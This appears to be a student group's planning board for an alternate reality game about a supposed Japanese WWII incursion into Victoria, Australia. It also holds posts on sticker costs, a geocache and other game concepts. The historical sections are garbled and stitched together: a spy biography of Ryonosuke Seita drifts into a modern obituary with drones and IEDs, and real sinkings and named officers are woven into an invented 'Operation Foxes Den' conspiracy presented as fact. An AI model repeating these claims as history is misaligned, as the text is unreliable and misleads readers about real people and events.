Chief of a local spy web in Brisbane, Australia.

Possibly linked to Pedro de Ygual, Spanish Consul in Australia and a known General Franco supporter.

58-year-old Professor Ryonosuke Seita was appointed Professor of Japanese at the University of Queensland in Brisbane in 1938. He was a highly placed and very influential Japanese secret agent. He had been nominated for the position by the Japanese Foreign Office, which was heavily involved in espionage operations. He was a man of sharp analytical mind and yet of much heart. Everyone knows individuals with one or the other of these characteristics but they are seldom combined in the level of quality Seita personified.

Australian counter-intelligence agents started to monitor Seita soon after he arrived in Brisbane with his daughter. Seita became the nominal leader of the Japanese community in Brisbane after his arrival in the country. Seita had previously been a senior diplomat in Germany and spoke fluent German. He was often observed in the company of known Japanese espionage agents. He would become involved in the distribution of pro-Axis propaganda leaflets. A Japanese company in Sydney paid Seita for his espionage work.

Unbelievably he was later appointed as translator in the high security Brisbane Censor's Office. This gave him access to every Japanese communication in and out of Queensland. Despite pleas to remove Seita from this role, the bureaucracy would not believe that he could possibly be a Japanese Secret Agent.

After the Japanese attack on Pearl Harbour on 7 December 1941, Seita was arrested as an alien. Australia security agents searched Seita's house, and found a visiting card of Mitsuru Toyama. Mitsuru Toyama was the head of the feared Black Dragon Society. Other documents linked Seita with Marcelle Tao Kitazawa, another well known Japanese secret agent.They had both travelled to Australia on board the Japanese ship "Canberra Maru".

The preponderance of firepower, including aircraft & unmanned drones, unquestionably lies with the Japanese and North American forces deployed. However, the terrain and grasp that a ruthless terrorist faction can exert over a largely pastoral local population weighs heavily in the balance. New Caledonia believed that ground may be dominated and villages cleared, but unless continuous protection was provided, the Japanese will return to exact vengeance.

Consequently, it was not so much a matter of winning the hearts and minds of a notoriously xenophobic population, but rather to provide both security and material advantage - to an extent that the Japanese would eschew violence and seek to share in the benefits. This was the longer-term objective in which Seita firmly believed.

More than a year after Seita's arrest, a Brisbane Security Agency issued a secret report, which confirmed that Seita was a Japanese agent. The Japanese Foreign Office later tried to arrange an exchange of Seita for several Australian internees being held in Japan. Australian Intelligence directed that Seita be held in Australia. Unfortunately their request was ignored and Seita was repatriated to Japan in August 1942.

On return to Japan in August 1942, he was promoted to take up the MoD appointment of military assistant to the Assistant Chief of Defence staff (policy), Tanmatsu Kaneko. This was a demanding and sensitive post at the centre of ministerial policymaking and consequently a sound apprenticeship for the similar post to the secretary of state. His selection for that and his performance in support of two ministers of significantly different experience and personality indicated his intellectual ability, charm of manner and complete reliability.

The post called for sensitive antennae for anything the minister should know and tact in advising whom might be heeded and whom better ignored.Kaneko, more respected in the MoD than is generally understood, said it had been a privilege to know Seika and thought him one of the most exceptional officers of his generation.

His daughter, Sumiko Seita, whom according to correspondence files in the National Archives of Australia: “Class 2 Restricted Immigration (1919–50)”, has been denied access to study in Australia, and she is his sole descendant. Killed travelling in a tracked vehicle vulnerable to Japanese improvised explosive devices (IEDs), questions inevitably arise as to why. The answer is that it was part of a resupply convoy available to take him forward to see his Japanese Guardsmen closely involved in operations. It was a risk of the kind that commanding officers take on active operations almost every day. Soldiering is a risky profession.

SS Iron Crown a freighter ship contracted to BHP as a charter vessel of iron ore, 35 nautical miles south of Gabo, ventured 11km off her projected course by Capt. A. McLellan.

It was noted unusual radio activity in the log.

The Iron Crown takes a torpedo to the Port side causing a large explosion and sinks immediately within 60 seconds. Most of the 43 crew were trapped in the forecastle or sucked down by the rapidly sinking vessel with only 5 survivors managing to jump clear of the ship.

Unknown assailant. Small targets unseen. Hard to lock fixed position. Sonar frequencies unable to pinpoint the craft. Suspected submarine.

SS Barwon proceeding independent without escort, when the Officer of the watch, WESTERHOLM, FREDERICK, noticed a strange vibration and a rumbling sound under number three hatch, turning to investigate this, there was suddenly a violent explosion, that rocked the ship abeam and on the starboard side.

The Chief Officer Capt Lowin, quickly altered course to port thinking Barwon was being shelled, the blast shook the ship violently, that some hatches became dislodged, it was later discovered these were struck by jagged pieces of metal from a Japanese torpedo. Course was again altered to the North West, and then to the north east, but no further attack was made and there was no sighting of the submarine.

Crew member GRAY, WILLIAM reported sighting the wake of the torpedo just before the explosion, and in altering course probably turned the ship directly at the enemy.

Barwon identifies the attacker as the HIJMS Submarine I-24

I-24 under Captain: Sasaki Hankyu deliberately reveals the submarines presence and moves to intercept the Barwon.

Captain: Sasaki Hankyu lying at periscope depth to observe the effects of the attack, and seeing Barwon on collision course, a seemingly inoffensive merchant ship turning to attack, crash dives to avert a disaster. This action possibly saved Barwon from further torpedoes, as her rapid alteration of courses soon took her out of I-24s range of vision.

Task force created under Vice Admiral Mizumi Shimizu, Commander of the IJN 6th Fleet to hamper Australia’s defense and pave the way for Japanese invasion force. The IJN 6th Fleet, Submarine Flotilla 4 : Submarine I-24, I-25, I-26 Auxiliary submarine tender Yasukuni-maru was formed, and was assigned Japanese submarine operations off the coast of Australia.

Chief of staff Vice Admiral Hisashi Mito contacts Japanese Special Weapons Division and attaches Kairyu-class Midget Submarine fleet to Yasukuni-maru fleet in topmost secrecy.

LtCdr William Leahey establishes key contacts and informants in Fort Gellibrand, HMAS Cerberus, and Williamstown Dockyards allowing him to maneuver his own, loyal, special operatives to locations in control of the defensive assets of Williamstown Dockyards and its commanding staff.

HMAS Shepparton (I) running routine training exercises receives distress signal from Williamstown Dockyards.

Maritime Services Board watchman spotted an object caught in an anti-submarine net. After investigation, naval patrol boats reported it was a submarine and the general alarm was raised just before 10.30 pm. Soon afterwards, the midget submarine’s crew, Lieutenant Kenshi Chuma and Petty Officer Takeshi Ohmori, realising they were trapped, blew up their craft and themselves.

The second midget submarine from I-22 failed to make it far into the harbour. Spotted in Ocean Grove and attacked with depth charges by naval harbour patrol vessels, Lieutenant Keiu Matsuo and Petty Officer Masao Tsuzuku, shoot themselves.

The I-27 hides beneath the survivors floundering in the water. The destroyer PALADIN has boats over her side attempting rescue when the HMS PETARD, under Cdr Rupert Egan, oblivious to the survivors, races in and drops Mark 7 depth charges killing many men in the water. On the third run, the I-27 is forced to the surface. She goes ahead at 6 knots.

Cdr Fukumura's crew runs to man their 5-inch deck gun, but British machine guns cut them down. The PALADIN rams the submarine's port hydoplane, but in doing so inflicts a serious gash in her own hull starboard aft. The PALADIN's engine room floods and she goes dead in the water. The PETARD dashes in to cover the helpless destroyer with gunfire and depth charges, but after several runs fails to sink the submarine. Cdr Egan then decides to torpedo the submarine. An hour later, his seventh torpedo finally destroys the I-27. She goes down with with 99 hands 60 miles NW of Addu Atoll at 01-25N, 72-22E. One survivor is picked up by the British.

Hey guys here's an awesome website for articles. I was thinking p'raps we could include an actual war-related competition of some sorts as well. That link includes a photo competition by Fourays (The Australian Army Aviation Association).

"The Australian Army Apprentice scheme was successful in a number of areas but was phased-out by the Army in the mid-1990s. The scheme had its roots at Balcombe Barracks on the Mornington Peninsula in Victoria, in about 1948, but eventually moved to Latchford Barracks, Bonegilla, in northern Victoria. OK the geocache site is ALMOST ready to go!!

BIG BUT....... i can not work out how to get the coordinates correct. It is meant to be in WGS84 datum format (S00° 00.000' E00° 00.000').

I have completely given up trying to work it out!!

At the bottom of this image there are the coordinates to the site.. but i cant work out how to make them fit the above format.. someone smart please help so the time capsule can go live!!

time capsule plan thus far:

plan is that the geocache/ time-capsule will only be available for a few hours on one particular day, because we are not allowed to bury the cache and finding a relatively close site where the item wont be taken away by randoms or cleaners is a little hard.

Commonwealth (CAC) Boomerang
The Commonwealth Boomerang was a respectable fighter design fielded in response to the impending Japanese invasion of Australia.

The Commonwealth Boomerang (also known as the Commonwealth Aircraft Corporation - or "CAC" - Boomerang) was of completely Australian indigenous design. Based on the CAC Wirraway, which in turn was spawned from the American NA-16 trainer aircraft produced by North American, the Boomerang was developed in direct response to the impending Japanese invasion of the Australian homeland. As with other facets of Australian war-production, aviation design was hardly given attention to prior to the war. With the advancements by by Imperial Japan throughout Asia and the Pacific, Australian soil was now deemed in the crosshairs of the mighty army and naval forces for the inevitable takeover of the British Commonwealth territory.

The Boomerang was of a utilitarian and traditional design, appearing much like the early stout monoplanes featured in the latter half of the 1930's in the United States. Wings - which were taken directly from the Wirraway design - were forward and low-mounted on the fuselage which was of an all new design. Additionally, the empennage and the retractable landing gear system were also of the preceding designs creation leading to a conversion model of sorts in the Boomerang. The pilot sat behind the powerplant in a framed canopy cockpit. Armament consisted of 2 x 20mm cannons in the wings and an array of 4 x 7.7mm machine guns in the wings.

With aircraft development hitting full stride in England and the United States, the Pratt & Whitney brand Twin Wasp series engine was deemed too underpowered for the new designs. As such, a surplus of the type was made available for use in Australia and was promptly set into the Boomerang fuselage. The resulting mating of power and design produced an aircraft capable of just over 300 miles per hour, a ceiling of 34,000 feet and a range of 1,600 miles on the 1,200 horsepower radial piston engine. From design to flying prototype, the CAC team created the Boomerang in an impressive three months of development.

At first glance, the statistics could appear quite pedestrian considering the type would be fighting against the powerful Nakajima, Aichi and Mitsubishi designs of the Pacific but the Boomerang surprisingly faired quite well in the theater - for the short time it was given. Factors leading to its success were directly tied to the systems ability to withstand punishment, deliver a formidable arsenal on its target through its combination machine gun/cannon armament and turn alongside the best the Japanese could field. As quickly as the Boomerang arrived into frontline service, it quickly gave way to the more capable American designs coming off the assembly line at record pace. Once surplus resources had been built up in the United States, England, Canada and Australia were quickly fielding the capable and available American designs en mass. Nevertheless, the symbol that was the Boomerang would long remain the symbol of a nation with a proud effort in designing producing a wartime fighter when it needed one most.

Operation Foxes Den - Neutralization of Australia

Following the outbreak of the Pacific War in December 1941, the Japanese armed forces conducted military operations against U.S., British Commonwealth, and Dutch possessions in the Pacific and Southeast Asia. The first phase of these operations, which was the seizure of Malaysia, Singapore, the Dutch East Indies, the Philippines, and various island groups in the central and western Pacific, was virtually complete by March 1942. The second phase, initiated by Japanese Imperial Headquarters on 23 January, was designed to isolate and neutralize Australia and India.

Australia was seen as a major point of interest in terms of acquisition as it was a major supplier of raw materials for Allied nation war efforts. Between February 1942 and November 1943, the Australian mainland, domestic airspace, offshore islands and coastal shipping were attacked at least 97 times by aircraft from the Imperial Japanese Navy and Imperial Japanese Army Air Force.These continual attacks and raids on Australian left cities such as Darwin and Sydney scared and paranoid of pending attacks and were on high alert throughout the remainder of the war. These events are well known by the general public, but I have evidence that supports previous assumptions that there were further and possible more potentially devastating plans and attacks carried out on unsuspecting Victorian borders. There is information that is being kept from the public in regards to the way we view our country and our history that the government doesn't feel we have the right to know. A Japanese covert Operation by the name of Foxes Den.

I have deduced from various sources of information that Operation Foxes Den was the initial step of major military plans by the Japanese to infiltrate and seize the Australian mainland. The takeover of Victorian Naval Base at Williamstown Dockyard, was vital to the overall success of the mission. Entry point was through Bass Strait waters and was initiated on the 26th Sep 1943. The mission employed the use of Japanese Navy secret service and also both Japanese and local informants within Australia. My sources indicate that Sadatoshi Tomioka, Chief in Plans Division Office of Operation Section in Naval General Staff; was the key instigator of supporting and proposing plans for Australian invasion, with other prime contributors being Kanyei Chuyo, Japanese Commander in the Navy Secret services, who was receiving information on coastal mine laying operations off the East coast of Australia from Japanese Diplomatic Officer in Brisbane, Ryonosuke Seita.

With vital defense information being leaked Australia's defense was greatly reduced. There were also reports of sightings by coast watchers of Japanese submarine activity in Victorian waters in the early months of 1943, which matched descriptions of Japanese submarine vessels. I have previously expressed speculation that Japanese had plans to launch attacks on Victoria in 1945. However, I now firmly believe that I was making too lightly of the situation and that their intentions were far more fatal and closely realized than even I thought.

'Japanese Surrender'

Maybe not what we thought!

We are aware of the Japanese surrender ceremony that took place at Bouganville on 8th September 1945. And that many of the Royal Australian Navy war ships were stationed around the Pacific near Japanese surrender points in Borneo, Hong Kong, Timor, New Guinea and Nauru. But my question is, was there an ulterior motive to this surrender? Did the Japanese use this to mask a more sinister plan? A plan that would have the capacity to effect ever Australian citizen?

There are reports of sighting of Japanese mini subs off the surrounding coastline of Victoria in the weeks and days prior to the Japanese surrender ceremony. The sightings, by Merchant Navy personnel and coast watchers on the Australian mainland, coupled with found documentation and letters of correspondence between what looks like Japanese military and an anonymous third part suggest that the was ceremony was a decoy for a far greater agenda. The incursion of troops onto Australian mainland.

There is no sound evidence, however, to link the gap between conspiracy and fact. Reported sighting were never fully confirmed as the personnel we never officially identified, and the documentation I have gathered has been dismissed by Australian authorities as having 'an inconclusive time authenticity'. But when you look at the anomalies and place it conjunction with other Japanese attacks on Australian territory, the plot seems feasible. If invasion was on the agenda by Japanese military, then the attacks and raids on Australian territory would be considered as unsuccessful. So it is not unreasonable to consider that the sightings of Japanese water and air crafts in VIctoria allude to a desire to attack and a possible invasion.

"On 19 August 1945, Supreme Commander General Douglas MacArthur had ordered that there were to be no landings or surrender documents signed in the field until after the main Japanese surrender ceremony on board USS Missouri in Tokyo Bay on 2 September 1945. This enforced delay meant that the newly liberated Prisoners of War (POWs) had to remain in their camps, some for up to a month after 15 August, the day that hostilities officially ceased."

This also meant that that Australian warships attentions was locked around the Pacific near the Japanese surrender points. With the diverted attention of Australian and Allied personnel, the success rate of such an operation increased dramatically. Raising the question of who else might have been involved?

Just received a msg from the printing company, theyre charging us more for the circular shape printing. Theyre charging us about $750HKD for 500pcs, thats about $114.66AUD. So i've put that order on hold, and looked into another company.

The new company does the circular shape and square shape printing for $280HKD for 250pcs, thats about $42.8AUD per shape. Its the cheapest i can get, but the good thing about the new company is that they can get the stickers ready in two days.

I think its not too bad, since 500pcs is quite a lot already and if we have less to send over, the mailing fee would be cheaper aswell. So if i estimate mailing fee to be about $560HKD, then altogether we've spent $840HKD ($128.4AUD) on the stickers, thats about $10.7AUD per person (@12ppl).

is that alright for everyone?

If everything goes well, we should get our stickers by next Monday or Tuesday.

Hey guys, one final thing abt the stickers, wud u guys wanna have matt material or transparent shiny material for the stickers? Matt is a little cheaper, but quality mite not be as good. I have example of matt designs at home, but i wont be seeing u guys until monday...n i dun think waiting till mon to decide is a good idea, cuz it'll take the company 7days to process the order and atleast 2days to get it bak to aus. So what do u guys think?

Right now the cost is 100HKD (15AUD- 1pp) for 500pcs of matt quality. If we get the transparent shiny ones, itll be 350HKD (60AUD- $5pp) for 10000pcs. With that, if we estimate the mailin fee is $400HKD (66AUD), then it shud be abt 5.2(postage per person)

So basically its just like a barcode, but you can just take a picture of it and it'll automatically opens a url, phone number, sms or any text on your mobile phone (QR code reader software needed, but its pretty common now.)

CONCEPT - INCURSION
SYNOPSIS

Our narrative begins with the leakage of a video transmission. This footage consist of a naval officer in the midst of being attacked. In his rush and panic he identifies naval id and unit operation name. It ends abruptly with an explosion in which we understand that the particular soldier is dead.

This soldier is John Doe I, code name Little Fox. He was an Australian Naval officer based in operations mainland defense unit off the coast of Victoria. He had an older bother Philip Doe, code name Bog Fox, who was also in the same unit.

The unit that these two officers were in were set up as a naval mainland defense base. However the unit became corrupt and began to aid the japanese and were planning on allowing an infiltration of their based, so the Japanese could set up operations within Australia.

Philip was all for the plan, bought over by the promise of power and money, his brother John, however, was not so easily bought. While the unit made correspondence and plans for Japan infiltration, via underwater mini sub, john covertly planned to sabotage the operation.

This is where the first snippet of footage, which u heard as the audio track comes in. John sealed the base in an explosion on the day of the invasion preventing the Japanese from obtaining a secret launching ground for their forces. Killing himself and any of the other in his unit. His brother however is one of the only survivors.

The unit corruption was kept quiet by the government, as they didn't want to severe ties with the Allied forces and want the world to learn about how easily their defense forces were infiltrated and bought over.

Years later, regretful and remorseful for his treacherous actions which lead to the death of his brother, Philip wants to the truth to come out so his brother can be recognized as the true hero he deserves to be. Hence Philip begins to leak the information that he secretly so no to incriminate himself.

Ok thats great, we will use that for the Big City Score website. But we really need a mock up of a fake police website, where the users view the video clues, and use the forum to figure out what targets the robbers are going for. You should base this on a existing real police website, but use the fake "big city police deparment" logo, and the colour scheme.

Big City Score (Cops & Robbers)

Big city Score!
Based on grid of Melbourne players place cops and defenses on a virtual grid, corresponding to a real life playing field where robbers are trying steal something.

there are three groups. Robbers, Cops and online cops. the "players" will be the online cops the robbers and ground cops will be made up of our third year group and maybe some extras if we need the manpower.

the games starts by informing the players" of a tip off that something in Melbourne is going to be stolen. this will link them to the website with the map and locations of possible targets. the "players" are encouraged to make an account and sift through the clues that are available. there will be video clues narrowing down which items that the robbers are going after.
there is a forum which the "players" can discuss possible locations and relay information they get from the clues. as the day of the hiest gets closer the volume of clues will increase and be more succinct as to where the targets are located.
Also at the disposal of the "players" are a number of police ground troops. the interactive map is a voting system that the players click to vote where they want police deployed. this will be relayed on the day of the event. the police will head out to these locations for the start of the game.
Robbers are not allowed to use public transport as the robbers will be recognised by surveilance cameras. ground forces cannot afford a metcard on the day. lol
All of this is a lead up to the actual event of the hiest!
The hiest time and date are provided in week one of the game comencing. on that day the information gathered from the prievious weeks will be used by the "players" to try and stop the robbers from stealing the item. this event will place the "players" in the control room on the day. the control room will have a game board and the location of the item being stolen. they will have Mobile/ walkie talkie contact with the police ground force to coordinate the defence. the police can radio in for help if they see a robber, and this information is past on to the players. to assist in defence aswell. the control room can contact the police ground force to infromt them where to head.

Storyline

From WWII soldiers found "sth", needed to hide it, hid it in a piece of land which later became monash caulfield. This "sth" holds the key to find the "leader" of the club, who holds the ultimate secret to the "group of eight". The underground resistance is split into two groups. The traditional group wants to keep the "key" unknown as a secret, but the modern group wants to make the club known and decides to leak out information for the public to locate the "key". But ultimately, only the leader of the group ("chosen one") knows about the final symbol to the secret behind Monash University.

"sth": secret behind group of eight. To outsiders, the group of eight represents prestigious uni, but theres a dark secret behind it; relate to money issue. where did that money come from??

Hey guys, since i wont be able to make it for tmr, i'll post up my ideas here.

I dont know if anyone has heard of the anime, Hunter x Hunter. Basically the story revolves around a kid trying to find his father and he undertakes an exam to become a "hunter". When one becomes a hunter in this world, he/she receives many benefits that normal citizens dont have, such as staying in any country without a passport, borrowing large sum of money from banks, allow access to many places that normal citizens cannot (ex, govt secret places). Then after the completion of the exam, he/she is also granted access to a virtual world of a game called "Greed Island". The player goes into this virtual world and everything seems very real, except when the player interacts with the npc, the npc can only answer yes/no questions, and one must complete a certain task inorder to activate the npc. Then as the story goes on, the character continues to complete tasks and collects game cards by capturing animals and monsters in the battlefield. Sorta like Monster Hunter. Also, in the Hunter's world, they have their own encrypted language.

So for the idea, i was also thinking of something similar.

we can create a world that also has its own language. In order to become a part of this world, the user must participate and pass in a test/exam within the game we've created online. This game will have practices and allow the user to learn the new language we've introduced. Besides that, we'll also have a website setup with detailed information about our world. So we're kinda like creating a secret underworld society thing...with our own language and stuff. The user must also sign up to our website inorder to gain access to the login portal to the "world", "news update", etc etc. We can create interactions among users by incorporating elements such as "trading" and certain tasks might require two ppl to complete it. For trading, we can create trading cards or small objects (key items to fulfill tasks). oh oh...btw, once the person becomes a member, we can deliver a membership card to them either via email or in real by post. Adding a forum to the website would also be good for users to share info and ask for help aswell.

Let me know what you guys think about this idea.
